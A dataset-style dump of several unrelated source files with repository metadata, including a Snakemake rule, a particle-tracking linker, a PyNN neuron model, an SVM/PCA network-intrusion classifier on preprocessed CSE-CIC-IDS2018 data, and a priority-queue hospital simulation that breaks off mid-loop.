# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
@author: Adolfo Gómez, dkmaster at dkmon dot com
"""
from .Authenticator import RegexLdap
| [
"dkmaster@dkmon.com"
] | dkmaster@dkmon.com |
85276507b54d3f216c070a9c8873c8ff120d8120 | 72a8181e5502128fec62b132fbe19cd9d50dab4c | /rules/plot.smk | 28df3be0b7d220ab200f373be5f95348d4b02f2c | [] | no_license | EthanHolleman/DRIP-AGS-ENCODE | 1fd3b7065ec7f47e783674df14955a7b655edc08 | e3bb63b6d1cae82ddc6fe8857a1e66e2f41b2781 | refs/heads/main | 2023-04-03T21:07:34.651467 | 2021-04-23T02:42:18 | 2021-04-23T02:42:18 | 360,375,206 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | smk |
# Plot feature-intersection counts from the concatenated all-sample BED,
# using the R script inside the pinned conda R environment.  mkdir runs
# first because the R script does not create its output directory itself.
rule make_feature_intersection_plot:
    conda:
        '../envs/R.yml'
    input:
        'output/intersect/all_samples_concat.intersection.bed'
    output:
        'output/plots/feature_intersection_plot.png'
    shell:'''
    mkdir -p output/plots
    Rscript scripts/plot_encode_intersections.R {input} {output}
''' | [
"etholleman@ucdavis.edu"
] | etholleman@ucdavis.edu |
72934eff4f36840bbb0eaeaed8669ed059f2aca7 | 646212a664d3100af57ec1a6c0a4e450e51f991a | /particles/linktracks.py | e213831ba2ca6d9fedbc9b56ba54afd6a26507a6 | [
"MIT"
] | permissive | luispedro/particles | e06edf241471c3e075b0f3f0295bcf5b1506980c | 3bd05a85e7f78be933277b778ba124d396b19238 | refs/heads/master | 2021-01-20T21:26:07.742196 | 2009-05-30T20:51:45 | 2009-05-30T20:51:45 | 1,408,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,753 | py | This product includes software developed by Brian M. Clapper
(bmc@clapper.org, http://www.clapper.org/bmc/). That software is
copyright © 2008 Brian M. Clapper.
import numpy as np
import random
import math
from munkres import Munkres
'''
def generate_posits(tracks):
this function takes tracks and generates
(1) a video (3D array) of particles moving and (2) a list of list of particle positions
Both of these objects are useful for testing the LINK_TRACKS method below, where the position
lists are converted into a list of Tracks.
GENERATE_POSITS should be commented out when run as part of PARTICLES.
video = np.zeros((timesteps,L,L))
positions = []
# create video as 3D (t,x,y) array
for i in xrange(len(tracks)):
for j in xrange(len(tracks[i][1])):
video[tracks[i][0] + j][tracks[i][1][j].x][tracks[i][1][j].y]= 1
# print video # uncomment to show particle movement by frame
# create positions as list of lists(one poslist per timepoint)
posits = []
for t in xrange(np.size(video,0)):
pos = []
for i in xrange(np.size(video,1)):
for j in xrange(np.size(video,2)):
if video[t][i][j] == 1:
pos.append(Position(i,j))
posits.append(pos)
return (posits, video)
'''
def link_tracks(Positions):
    '''
    This function takes in a list of positions, per time frame, and constructs
    particle tracks based on solutions to the 'assignment problem'. This is done
    through the MUNKRES method by Brian Clapper, http://www.clapper.org/software/python/munkres/,
    which must be installed for LINK_TRACKS to work.
    The output format is identical to that from
    TRACKGENERATION.py: a list of tuples, where the first element is the starting time of
    the track, and the second element is a list of position objects, each having
    attributes x and y.
    '''
    pos = Positions
    TrackList = []
    Tracks = []
    t0 = 0
    T = len(pos) # one list of positions per time frame
    initNumOfTracks = len(pos[t0])
    # initialize all first tracks: one track per particle seen in frame t0
    TrackList = []
    for i in xrange(initNumOfTracks):
        TrackList.append(EachParticle(t0,pos[t0][i])) #.give_the_track())
    # move through positions by time, linking the particles of frame i to
    # those of frame i+1 via the minimum-total-distance assignment
    for i in xrange(T-1):
        curr_posits = pos[i]
        next_posits = pos[i+1]
        cost = make_cost(curr_posits, next_posits)
        m = Munkres()
        # optimal (row -> column) pairing minimizing summed distance
        indices = m.compute(cost)
        # print indices
        for row, column in indices:
            for j in xrange(len(TrackList)):
                # A row index beyond the real particles is a padded row,
                # i.e. a particle appearing for the first time in frame i+1.
                # NOTE(review): this branch executes once per iteration of
                # the j loop, so one new particle appears to spawn
                # len(TrackList) duplicate tracks; it looks like it was
                # meant to run once per (row, column) pair -- confirm.
                if row >= len(curr_posits): # create new track
                    TrackList.append(EachParticle(i+1,next_posits[column]))
                    #print 'track created'
                    continue
                # find the live track whose last recorded position matches
                # the current-frame particle for this assignment row
                if [lastElement(TrackList[j]).x, lastElement(TrackList[j]).y] == [curr_posits[row].x, curr_posits[row].y] and TrackList[j].active:
                    if column >= len(next_posits): # track deleted
                        TrackList[j].active = 0
                    else: # append new location to existing track
                        TrackList[j].poslist.append(next_posits[column])
    # convert tracks from EachParticle to Particle format
    Tracks = []
    for i in xrange(len(TrackList)):
        Tracks.append(TrackList[i].give_the_track())
    return Tracks
def make_cost(curr, next):
    '''
    Build the square cost matrix for the Munkres assignment between the
    particles of frame ``curr`` and frame ``next``; entry [c][n] is the
    Euclidean (2-norm) distance between curr[c] and next[n].

    The matrix is padded to max(len(curr), len(next)) square:
      * extra rows (more next- than curr-particles) stay zero;
      * extra columns (more curr- than next-particles) are filled with the
        row maximum so that "particle disappears" is the costliest match.

    Fixes two bugs in the original padding loop: it iterated the Position
    objects themselves instead of row indices (a TypeError when reached),
    and its xrange(len(curr), len(next)) was empty in the only case the
    branch runs (len(curr) > len(next)), so no padding ever happened.
    '''
    size = max(len(curr), len(next))
    cost = np.zeros((size, size))
    # real pairwise assignment costs (pad rows/columns remain zero for now)
    for c in xrange(len(curr)):
        for n in xrange(len(next)):
            cost[c][n] = distance(curr[c], next[n])
    if len(curr) > len(next):
        # pad the missing columns of every real row with that row's maximum
        for c in xrange(len(curr)):
            row_max = max(cost[c])
            for n in xrange(len(next), len(curr)):
                cost[c][n] = row_max
    return cost
def distance(position_1, position_2):
    """Euclidean (2-norm) distance between two objects with .x/.y attributes."""
    dx = position_1.x - position_2.x
    dy = position_1.y - position_2.y
    return np.sqrt(np.square(dx) + np.square(dy))
def lastElement(track):
    # A track tuple is (start_time, position_list); return the newest position.
    track_tuple = track.give_the_track()
    positions = track_tuple[1]
    return positions[-1]
# uncomment the following lines to run LINKTRACKS independently
'''
L = 5
timesteps = 5
testTracks = generate_tracks(1, L, 1, 3, 1, timesteps - 1)
(listOfPosLists, video) = generate_posits(testTracks)
tracks = link_tracks(listOfPosLists)
'''
| [
"ajs171@pitt.edu"
] | ajs171@pitt.edu |
1af643695b4192619ffcd424991f063d051f610c | 6cac02f4df495f1acec3fde64335aa4881230cba | /tutorials/foo-tutorial/foo/foo.py | c828d610c07b3232e3f034ebfbced761d19fd565 | [] | no_license | ivannz/pkg_deploy_repo_renamed | 96610728c097f0bb77a047b09681bb1d5fe6ffc3 | 9ce24ffcc5db6235dd3946f8a63123c3955ea957 | refs/heads/master | 2020-07-16T17:28:59.668633 | 2019-09-03T07:08:29 | 2019-09-03T07:08:29 | 205,832,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 193 | py | def this():
from this import s
d = {}
for c in (65, 97):
for i in range(26):
d[chr(i + c)] = chr((i + 13) % 26 + c)
return "".join(d.get(c, c) for c in s)
| [
"ivannz@yandex.ru"
] | ivannz@yandex.ru |
2a21ac1ec7913bc31720e0eb686e858987acfe58 | 75117becf9f75122e60cd806599ae24c16065689 | /python_models8/neuron/builds/IF_curr_exp_i.py | 307db7fb5aee6fefae5f3e8176e659b1466f3901 | [] | no_license | chanokin/sPyNNaker8NewModelTemplate | d911443fa650a4016828341fd252ddb2d7bad313 | 2d64f34ed5a8f5312a3176792bee57339785c5ea | refs/heads/master | 2020-11-27T01:10:50.593741 | 2020-01-07T15:56:54 | 2020-01-07T15:56:54 | 229,252,692 | 0 | 0 | null | 2019-12-20T11:28:48 | 2019-12-20T11:28:48 | null | UTF-8 | Python | false | false | 2,945 | py | # A PyNN Model for standard neurons built from components
from spynnaker.pyNN.models.neuron import AbstractPyNNNeuronModelStandard
# Components from main tools
from spynnaker.pyNN.models.neuron.input_types import InputTypeCurrent
from spynnaker.pyNN.models.neuron.synapse_types import SynapseTypeExponential
from spynnaker.pyNN.models.defaults import default_initial_values
from spynnaker.pyNN.models.neuron.neuron_models.neuron_model_leaky_integrate_and_fire import NeuronModelLeakyIntegrateAndFire
from python_models8.neuron.threshold_types.AdaptiveThreshold import AdaptiveThreshold
class IF_curr_exp_i(AbstractPyNNNeuronModelStandard):
    """Current-based leaky integrate-and-fire neuron with exponential
    synapses and an adaptive firing threshold.

    Assembles the standard LIF neuron model, exponential synapse type and
    current input type together with the custom ``AdaptiveThreshold``
    threshold type, and points the framework at the ``IF_curr_exp_i.aplx``
    binary that implements the model on the machine.
    """

    @default_initial_values({"v_init", "isyn_exc", "isyn_inh"})
    def __init__(self,
                 # neuron model parameters and state variables
                 i_offset=0.0,
                 v_init=-70.0,
                 v_rest=-70.0,
                 v_reset=-100.0,
                 tau_m=10.0,
                 cm=2.0,
                 tau_refrac=3.0,
                 # threshold type parameters
                 v_threshold=-10.0,
                 tau_threshold=120,
                 w_threshold=1.8,
                 # synapse type parameters
                 tau_syn_E=5.0,
                 tau_syn_I=5.0,
                 isyn_exc=0.0,
                 isyn_inh=0.0
                 ):
        # fall back to the resting potential when no initial voltage is given
        if v_init is None:
            v_init = v_rest
        # cache the values that are exposed through the properties below
        self.__v_init = v_init
        self.__v_threshold = v_threshold
        self.__tau_threshold = tau_threshold
        self.__w_threshold = w_threshold
        # build the four standard-model components from the parameters
        neuron_model = NeuronModelLeakyIntegrateAndFire(v_init, v_rest, tau_m, cm, i_offset, v_reset, tau_refrac)
        synapse_type = SynapseTypeExponential(tau_syn_E, tau_syn_I, isyn_exc, isyn_inh)
        input_type = InputTypeCurrent()
        threshold_type = AdaptiveThreshold(v_threshold, w_threshold, tau_threshold, v_rest)
        super(IF_curr_exp_i, self).__init__(
            model_name="IF_curr_exp_i",
            binary="IF_curr_exp_i.aplx",
            neuron_model=neuron_model,
            input_type=input_type,
            synapse_type=synapse_type,
            threshold_type=threshold_type
        )

    # --- simple accessors for the cached parameter values ---

    @property
    def v_init(self):
        """Initial membrane voltage state value."""
        return self.__v_init

    @v_init.setter
    def v_init(self, v_init):
        self.__v_init = v_init

    @property
    def v_threshold(self):
        """Base threshold voltage passed to AdaptiveThreshold."""
        return self.__v_threshold

    @v_threshold.setter
    def v_threshold(self, v_threshold):
        self.__v_threshold = v_threshold

    @property
    def tau_threshold(self):
        """Threshold adaptation time constant passed to AdaptiveThreshold."""
        return self.__tau_threshold

    @tau_threshold.setter
    def tau_threshold(self, tau_threshold):
        self.__tau_threshold = tau_threshold

    @property
    def w_threshold(self):
        """Threshold adaptation weight passed to AdaptiveThreshold."""
        return self.__w_threshold

    @w_threshold.setter
    def w_threshold(self, w_threshold):
        self.__w_threshold = w_threshold
| [
"chanokin@gmail.com"
] | chanokin@gmail.com |
16b2f102d13e260917ee44549fe5a1a09bc216a1 | c57414aa625d16e46f719cc1f89d347fc0500963 | /tools/test/sql_test.py | 900d3e5a8f7a125d86bfc47d29e03acde638a6ef | [] | no_license | W1nU/Coalert-Server | be3938c1ddedb83cdd0b4c5c173fee50a4b41b55 | 74834097f304d66963da21afc9377d55dfa9efe2 | refs/heads/master | 2020-03-30T05:08:21.326801 | 2018-10-13T17:35:50 | 2018-10-13T17:35:50 | 150,782,820 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | import os
import sys
# Append the parent of this file's directory (tools/) to sys.path so the
# wildcard import below can resolve when this test is run directly --
# presumably database.py lives in tools/; verify against the repo layout.
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from database import *
| [
"jsw9808@gmail.com"
] | jsw9808@gmail.com |
0f2ac223d96f5a6d71a7a54cad6006c3bc48733c | b6f8b2f023004fc0ea185b5e1ef2cbccce9ef513 | /misc/figures_thesis.py | 05bcf26cc2a72e5051b3bd7f7406d3d6a1d50359 | [
"BSD-3-Clause"
] | permissive | tenglongcong/petibm-examples | a73a6cdba864269fe9402d0a8b44582f2bcbcd9f | 3817d50b0b26df5901701c0cfe82a2d57c964e89 | refs/heads/master | 2020-11-27T17:12:28.335357 | 2019-12-04T23:51:54 | 2019-12-04T23:51:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 979 | py | """Gather figures (to be included in thesis)."""
import os
import pathlib
import shutil
rootdir = pathlib.Path(__file__).absolute().parents[1]
n_parts = len(rootdir.parts)

# Make sure the destination directory exists.
figdir = rootdir / 'figures_thesis'
figdir.mkdir(parents=True, exist_ok=True)

# Read the repo-relative figure paths to gather ('#' lines are comments).
inpath = rootdir / 'misc' / 'figures_thesis.txt'
filepaths = []
with open(inpath, 'r') as infile:
    filepaths = [rootdir / line.strip()
                 for line in infile
                 if not line.startswith('#')]

# Build a flat output name for each figure: the sub-directories of its
# parent (skipping the two leading components and any 'figures' folder)
# joined to the file name with underscores.
filenames = []
for filepath in filepaths:
    subdirs = [part for part in filepath.parent.parts[n_parts + 2:]
               if part != 'figures']
    flat_name = '_'.join(subdirs + [filepath.name]).lstrip('_')
    filenames.append(flat_name)

# Copy every figure into the output directory under its new name.
for src, new_name in zip(filepaths, filenames):
    shutil.copy(src, figdir / new_name)
| [
"mesnardo@gwu.edu"
] | mesnardo@gwu.edu |
7ca45edf23818b3c74ce0cf938d26cfb845f23aa | 4b46a3266967acfd8e1d2f753d9803aa8d666d9f | /api/client.py | 630a6c9561b6821c9c3a8791508b8f74c7028694 | [] | no_license | dlbewley/WebDevTemplates | 601e48d7cdb8f7405bbb36da5660fcf8e349f0a8 | e3a685d22abd5a4ef828d91797b1d6c44b2bbdc1 | refs/heads/master | 2021-01-17T23:11:13.976923 | 2015-03-13T01:29:46 | 2015-03-13T01:29:46 | 31,397,821 | 1 | 0 | null | 2015-02-27T01:30:54 | 2015-02-27T01:30:54 | null | UTF-8 | Python | false | false | 2,274 | py | #!/usr/bin/env python
import pycurl
import cStringIO
import json
import random
# make sure to:
#
# pip install pycurl
#
# we are not including pycurl in the requirements.txt file because
# this script is an example of a standalone client that another user
# would use to access your api (just like the curl commands
# in the readme file, but in a full-blow python script instead).
# running this script will post an example tag, and will also get
# a list of all current tags. make sure you setup the app first tho.
###############################################################################
def generateRandomTag():
###############################################################################
    """Return a random word from the system dictionary, used as a tag name."""
    word_file = "/usr/share/dict/words"
    WORDS = open(word_file).read().splitlines()
    # random.choice always picks a valid index; the previous
    # randint(0, len(WORDS)) was inclusive at both ends and could index one
    # past the end, raising IndexError roughly once in len(WORDS)+1 calls.
    return random.choice(WORDS)
###############################################################################
def post():
###############################################################################
    """POST a new randomly-named tag to the local tags endpoint as JSON."""
    # build the request
    endpoint = 'http://localhost:5000/tags'
    payload = json.dumps({"name": generateRandomTag()})
    # fire it off with pycurl
    curl = pycurl.Curl()
    curl.setopt(pycurl.URL, endpoint)
    curl.setopt(pycurl.HTTPHEADER, ['Content-Type: application/json'])
    curl.setopt(pycurl.POST, 1)
    curl.setopt(pycurl.POSTFIELDS, payload)
    curl.perform()
    curl.close()
###############################################################################
def get():
###############################################################################
    """Fetch and print the current list of tags from the local API (Python 2)."""
    # initialize: target endpoint and an in-memory buffer for the response
    api = 'http://localhost:5000/tags'
    buf = cStringIO.StringIO()
    # run: WRITEFUNCTION streams the response body into buf
    c = pycurl.Curl()
    c.setopt(c.URL, api)
    c.setopt(c.WRITEFUNCTION, buf.write)
    c.perform()
    # NOTE(review): unlike post(), c.close() is never called here -- a minor
    # handle leak; confirm and add c.close() when next touching this code.
    # display the decoded JSON payload
    data = json.loads(buf.getvalue())
    buf.close()
    print data
###############################################################################
def main():
###############################################################################
    """Exercise the API end to end: post one random tag, then list all tags."""
    print '\n*** POST ***\n'
    post()
    print '\n*** GET ***\n'
    get()
###############################################################################
if __name__ == '__main__':
    main()
###############################################################################
| [
"sms@pixar.com"
] | sms@pixar.com |
a0dd99b7f5cfeb2e2a69bd6b6f42ec9a16cf0864 | e2694203560eb49e1a32e4b380d75d36d7fe39e1 | /svm_binary_pca.py | b4308fb9fe6f8542ab497e538bdebb65ab41d4a1 | [] | no_license | TPLink32/ML-based-Network-Intrusion-Detection-using-Cyber-Dataset-CSE-CIC-IDS2018-to-classify-network-attacks | 66c85b2f525f0374a1942f5eb07ecb7c9a4d2021 | 3e9b43c876978f29570569199dfdcd86528616c0 | refs/heads/master | 2023-02-07T19:36:22.249235 | 2020-12-26T16:08:14 | 2020-12-26T16:08:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,989 | py | import numpy as np
import pandas as pd
#from sklearn.kernel_approximation import RBFSampler
#from sklearn.linear_model import SGDClassifier
#from sklearn.model_selection import train_test_split
from sklearn import svm
from sklearn.metrics import classification_report
from sklearn import metrics
#from sklearn.linear_model import LogisticRegression
#from sklearn.naive_bayes import GaussianNB
#from sklearn.neighbors import KNeighborsClassifier
#from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import (precision_score, recall_score,f1_score, accuracy_score,mean_squared_error,mean_absolute_error)
#from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.preprocessing import Normalizer
#from sklearn.model_selection import GridSearchCV
from sklearn.svm import SVC
from sklearn.metrics import confusion_matrix
from sklearn.decomposition import PCA
#from sklearn.metrics import auc
traindata = pd.read_csv('preprocessed_train_4a_new.csv', header=None)
testdata = pd.read_csv('preprocessed_test_4a_new.csv', header=None)
# column 0 is an id/index, columns 1-70 are the features, column 71 the label
X = traindata.iloc[0:,1:71]
Y = traindata.iloc[0:,71]
T = testdata.iloc[0:,1:71]
C = testdata.iloc[0:,71]
# Normalizer scales each row independently (its fit is stateless), but the
# original also re-fitted PCA on the test set, projecting train and test
# onto DIFFERENT component bases -- the classifier was then evaluated on
# features from another space.  Fit everything on the training data once
# and reuse the fitted transformers for the test set.
scaler = Normalizer().fit(X)
trainX = scaler.transform(X)
testT = scaler.transform(T)
# PCA: keep the 50 leading components learned from the training data
pca = PCA(n_components=50)
pca.fit(trainX)
x_train_pca = pca.transform(trainX)
x_test_pca = pca.transform(testT)
traindata = np.array(x_train_pca)
trainlabel = np.array(Y)
testdata = np.array(x_test_pca)
testlabel = np.array(C)
#SVM
print("------------------------SVM Classifier--------------------")
#proba = model.predict_proba(testdata)
#np.savetxt('predictedlabelSVM-rbf.txt', predicted, fmt='%01d')
#np.savetxt('predictedprobaSVM-rbf.txt', proba)
'''
print("-------------------------Random Forest binary----------------------------")
#create the model with 100 trees
model = RandomForestClassifier(n_estimators=1000)
model = model.fit(traindata, trainlabel)
# make predictions
expected = testlabel
## Actual class predictions
predicted = model.predict(testdata)
pn.savetxt('predictedRF.txt', predicted, fmt='%01d')
# summarize the fit of the model
accuracy = accuracy_score(expected, predicted)
#recall = recall_score(expected, predicted, pos_label=1,average="binary")
#precision = precision_score(expected, predicted , pos_label=1,average="binary")
#f1 = f1_score(expected, predicted , pos_label=1,average="binary")
cm = metrics.confusion_matrix(expected, predicted)
tpr = float(cm[0][0])/pn.sum(cm[0])
fpr = float(cm[1][1])/pn.sum(cm[1])
#print("%.3f", tpr)
#print("%.3f", fpr)
print("Accuracy: ")
print("%.3f" %accuracy)
#print("Precision: ")
#print("%.3f" %precision)
#print("Recall: ")
#print("%.3f" %recall)
##print("f-score: ")
#print("%.3f" %f1)
print("FPR: ")
print("%.3f" %fpr)
print("TPR: ")
print("%.3f" %tpr)
print ("Confusion matrix: ")
print (metrics.confusion_matrix(expected, predicted))
# performance
print ("Classification report for %s", model)
print ("\n")
print (metrics.classification_report(expected, predicted))
'''
print("----------------------SVM linear binary---------------------------")
# Linear-kernel SVM with penalty C=1000; probability estimates disabled.
model = svm.SVC(kernel='linear', C=1000,probability=False)
model.fit(traindata, trainlabel)
print(model)
# make predictions on the held-out test set
expected = testlabel
predicted = model.predict(testdata)
#proba = model.predict_proba(testdata)
#np.savetxt('G:/Pramita/FALL 2018_2ND_SEM/MS_Thesis/NIDS/Network-Intrusion-Detection-master/NSL-KDD/traditional/binary/predictedlabelSVM-linear.txt', predicted, fmt='%01d')
#np.savetxt('G:/Pramita/FALL 2018_2ND_SEM/MS_Thesis/NIDS/Network-Intrusion-Detection-master/NSL-KDD/traditional/binary/predictedprobaSVM-linear.txt', proba)
# summarize the fit of the model
accuracy = accuracy_score(expected, predicted)
#recall = recall_score(expected, predicted , pos_label=1,average="binary")
#precision = precision_score(expected, predicted ,pos_label=1, average="binary")
#f1 = f1_score(expected, predicted,pos_label=1, average="binary")
cm = metrics.confusion_matrix(expected, predicted)
# NOTE(review): scikit-learn puts true classes on the rows of the confusion
# matrix, so these two ratios are the recalls of class 0 and class 1; the
# value printed as "FPR" below is therefore not a false-positive rate --
# confirm which metric was intended.
tpr = float(cm[0][0])/np.sum(cm[0])
fpr = float(cm[1][1])/np.sum(cm[1])
print("Accuracy: ")
print("%.3f" %accuracy)
#print("Precision: ")
#print("%.3f" %precision)
#print("Recall: ")
#print("%.3f" %recall)
#print("f1-score: ")
#print("%.3f" %f1)
print("FPR: ")
print("%.3f" %fpr)
print("TPR: ")
print("%.3f" %tpr)
print ("Confusion matrix: ")
print (metrics.confusion_matrix(expected, predicted))
# performance -- the original passed `model` as a second print() argument,
# which printed a tuple containing a literal "%s"; format the string instead.
print ("Classification report for %s" % model)
print ("\n")
print (metrics.classification_report(expected, predicted))
print("-----------------------SVMrbf Binary--------------------------------------")
# RBF-kernel SVM with default parameters; probability estimates disabled.
model = svm.SVC(kernel='rbf', probability= False)
model = model.fit(traindata, trainlabel)
# make predictions on the held-out test set
expected = testlabel
predicted = model.predict(testdata)
accuracy = accuracy_score(expected, predicted)
#recall = recall_score(expected, predicted, pos_label=1,average="binary")
#precision = precision_score(expected, predicted, pos_label=1,average="binary")
#f1 = f1_score(expected, predicted, pos_label=1,average="binary")
cm = metrics.confusion_matrix(expected, predicted)
#print(cm)
# NOTE(review): as in the linear section, these are per-class recalls
# (rows of cm are the true classes); "FPR" below is mislabelled -- confirm.
tpr = float(cm[0][0])/np.sum(cm[0])
fpr = float(cm[1][1])/np.sum(cm[1])
print("Accuracy: ")
print("%.3f" %accuracy)
#print("Precision: ")
#print("%.3f" %precision)
#print("Recall: ")
#print("%.3f" %recall)
#print("f1-score: ")
#print("%.3f" %f1)
print("FPR: ")
print("%.3f" %fpr)
print("TPR: ")
print("%.3f" %tpr)
print ("Confusion matrix: ")
print (metrics.confusion_matrix(expected, predicted))
# performance -- fixed: the original printed a tuple ("... %s", model)
# instead of formatting the model into the string.
print ("Classification report for %s" % model)
print ("\n")
print (metrics.classification_report(expected, predicted))
"noreply@github.com"
] | noreply@github.com |
9a89eb24723752edbc2a66b1541fe2fc2ce40807 | 071dcda0b97447701bfcd24be84917cc956f3d14 | /queuing theory .py | 46869c315062d3b6069acd7dad1472f9a4288e2d | [] | no_license | yukiiwong/Queuing-Model-with-Preemptive-Priorities | d71897cb44fee85393e72a78904022634826db1f | a75d7bc4f86162c78ab8785eadd366f4de7ea1ac | refs/heads/master | 2020-04-12T07:43:45.576606 | 2018-12-19T06:36:43 | 2018-12-19T06:36:43 | 162,368,571 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,122 | py | import numpy as np
from PIL import Image,ImageDraw,ImageFont
import cv2
import numpy
#initial input
# Arrival rates (expected patients per one-minute tick) for the three
# priority classes.
lambda1 = 2*0.2/60
lambda2 = 1.3*0.6/60
lambda3 = 1.2/60
# service-rate parameter (appears unused in the code below -- confirm)
u = 3*1.1
# Simulation horizon: one tick per minute for 10 days.
simu_num = 60*24*10
#input procedure: Poisson arrival counts for every minute of the run
x1 = np.random.poisson(lam = lambda1,size = simu_num)
x2 = np.random.poisson(lam = lambda2,size = simu_num)
x3 = np.random.poisson(lam = lambda3,size = simu_num)
sum_patient = x1.sum() + x2.sum() + x3.sum() #total number of patients
ux = np.random.poisson(lam = 3,size= (sum_patient,20))
ser_time = np.zeros(sum_patient,float)
for i in range(len(ux)):
    # NOTE(review): ux[i].mean() can be 0 (all 20 Poisson draws zero),
    # which would raise ZeroDivisionError -- unlikely at lam=3, but possible.
    ser_time[i] = round(60/ux[i].mean()) #each patient's service time, in minutes
#queuing model state
time_axis = []
finish_people = 0
finish_time1 = 0
finish_time2 = 0
finish_time3 = 0
queuing_line = [0,0,0]#waiting-queue lengths: [0] first class, [1] second, [2] third
doctor = 0
#record the W_q: arrival times and service-start times per priority class
tcome1 = []
tcome2 = []
tcome3 = []
twait1 = []
twait2 = []
twait3 = []
def record_come_time(i, x1, x2, x3, tcome1, tcome2, tcome3):
    """Log arrival time *i* once per patient that arrived this minute.

    x1/x2/x3 hold per-minute arrival counts for priority classes 1-3;
    tcome1/tcome2/tcome3 are extended in place and also returned.
    """
    for arrivals, log in ((x1[i], tcome1), (x2[i], tcome2), (x3[i], tcome3)):
        log.extend([i] * arrivals)
    return(tcome1, tcome2, tcome3)
def average(tcome, twait):
    """Mean waiting time, in hours, over the patients served so far.

    tcome[i] is patient i's arrival minute and twait[i] the minute its
    service started; only the first len(twait) arrivals have been served,
    so any extra entries in tcome are ignored.

    Fix: the original divided the summed waits by ``len(twait) + 1`` --
    apparently a guard against dividing by zero -- which biased the mean
    low.  Divide by the true count and return 0.0 for an empty sample.
    """
    if not twait:
        return 0.0
    total_wait = sum(start - arrive for arrive, start in zip(tcome, twait))
    # the simulation clock ticks once per minute, so /60 yields hours
    return total_wait / len(twait) / 60
#facilitating agency
def service_rule(i,finish_time1, finish_time2, finish_time3, queuing_line, doctor, finish_people, ser_time, twait1, twait2, twait3):
    """One scheduling step of the preemptive-priority single-doctor queue.

    At minute ``i``: free the doctor once every in-progress service has
    finished, then admit the highest-priority waiting patient (class 1
    first, then 2, then 3).  Starting a higher-priority service while a
    lower-priority one is still running (i < its finish time) preempts it:
    the interrupted patient is pushed back onto its queue and the
    service-start time recorded for it in twait2/twait3 is popped again.

    ser_time[finish_people] supplies the next service duration; the shared
    finish_people counter advances on every service start and is rolled
    back when a start is preempted.  Returns the updated state tuple.
    """
    # all in-flight services are done by now -> the doctor goes idle
    if (i >= finish_time1) and (i >= finish_time2) and (i >= finish_time3):
        doctor = 0
    if doctor == 1:
        pass
    else:
        if queuing_line[0] > 0:
            # start serving a first-class patient
            doctor = 1
            queuing_line[0] -= 1
            finish_time1 = i + ser_time[finish_people]
            finish_people += 1
            twait1.append(i)
            # preempt a second-class service still in progress
            if (i < finish_time2):
                twait2.pop()
                queuing_line[1] += 1
                finish_time2 = i
                finish_people -= 1
            # preempt a third-class service still in progress
            if (i < finish_time3):
                queuing_line[2] += 1
                finish_time3 = i
                finish_people -= 1
                twait3.pop()
        else:
            if doctor == 2:
                pass
            else:
                if queuing_line[1] > 0:
                    # start serving a second-class patient
                    doctor = 2
                    queuing_line[1] -= 1
                    finish_time2 = i + ser_time[finish_people]
                    finish_people += 1
                    twait2.append(i)
                    # preempt a third-class service still in progress
                    if (i < finish_time3):
                        twait3.pop()
                        queuing_line[2] += 1
                        finish_time3 = i
                        finish_people -= 1
                else:
                    if doctor == 3:
                        pass
                    else:
                        if queuing_line[2] > 0:
                            # start serving a third-class patient
                            doctor = 3
                            queuing_line[2] -= 1
                            finish_time3 = i + ser_time[finish_people]
                            finish_people += 1
                            twait3.append(i)
                        else:
                            pass
    return(doctor, queuing_line, finish_time1, finish_time2, finish_time3, finish_people,twait1,twait2, twait3)
##### Visualise the queuing procedure
# input patients' picture
patient1_pic = Image.open('1.jpg').resize((75, 75))
patient2_pic = Image.open('2.jpg').resize((75, 75))
patient3_pic = Image.open('3.jpg').resize((75, 75))
def wait_queue(i, img_bg, patient_pic):
    """Draw up to six waiting patients of priority class *i* onto the frame.

    Reads the module-global ``queuing_line``; row *i* of the frame (0-based,
    y = 212 + 100*i) shows that class's queue, drawn right-to-left starting
    at x=500.  Queues longer than six are truncated to six icons.

    Replaces the original 50-line if/elif ladder (one branch per queue
    length, each pasting the same icon at hard-coded x positions, via
    needless .copy() calls) with a single loop over those positions;
    the pasted icons and coordinates are unchanged.
    """
    x_slots = (500, 400, 300, 200, 100, 5)
    n_shown = min(queuing_line[i], len(x_slots))
    for x in x_slots[:n_shown]:
        img_bg.paste(patient_pic, (x, 212 + 100 * i))
    return img_bg
def sickroom(img_bg, patient1_pic, patient2_pic, patient3_pic, doctor):
    """Draw the sickroom: the patient currently in service, or a green room.

    ``doctor`` encodes which priority class is being served (1/2/3); any
    other value means the doctor is idle, so the room is repainted green.
    """
    in_service = {1: patient1_pic, 2: patient2_pic, 3: patient3_pic}
    pic = in_service.get(doctor)
    if pic is not None:
        img_bg.paste(pic.copy(), (900, 220))
    else:
        draw = ImageDraw.Draw(img_bg)
        draw.rectangle([(700, 150), (1000, 300)], fill=(0, 255, 0))
    return img_bg
#simulate the process
for i in range(simu_num):
    # generate the background: one fresh 1000x700 frame per minute
